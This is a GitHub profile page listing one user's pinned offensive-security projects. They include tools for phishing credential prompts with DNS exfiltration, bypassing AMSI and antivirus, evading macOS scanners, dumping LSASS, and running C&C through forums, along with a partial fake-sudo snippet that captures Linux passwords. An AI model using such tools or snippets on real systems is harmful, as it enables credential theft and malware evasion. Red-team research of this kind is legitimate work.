Skip to content
View tokyoneon's full-sized avatar
💻
tokyoneon@kali ~#
💻
tokyoneon@kali ~#

Block or report tokyoneon

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned Loading

  1. CredPhish Public

    CredPhish is a PowerShell script designed to invoke legitimate credential prompts and exfiltrate passwords over DNS.

    PowerShell 294 45

  2. exfil LSASS dump via Microsoft.Power...
    1
    # write-up: https://www.varonis.com/blog/author/tokyoneon/
    2
    
                  
    3
    # an if statement to prevent the attack from executing without administrator privileges
    4
    if (whoami /groups | findstr /i "S-1-16-12288")
    5
    {
  3. Chimera Public

    Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.

    PowerShell 1.5k 252

  4. Armor Public

    Armor is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners.

    Shell 280 58

  5. MyCC - turn MyBB forums into C&C ser...
    1
    #!/bin/bash
    2
    
                  
    3
    # https://null-byte.com/turn-forums-into-c-c-servers-0196708/
    4
    
                  
    5
    while true; do
  6. Sudo function for stealing Linux pas...
    1
    function sudo () 
    2
    { 
    3
        # https://null-byte.com/privesc-0194190/
    4
        realsudo="$(which sudo)";
    5
        read -s -p "[sudo] password for $USER: " inputPasswd;

519 contributions in the last year

Contribution Graph
Day of Week April May June July August September October November December January February March April
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
Less
No contributions.
Low contributions.
Medium-low contributions.
Medium-high contributions.
High contributions.
More

Contribution activity

April 2025

414 contributions in private repositories Apr 1 – Apr 9
Loading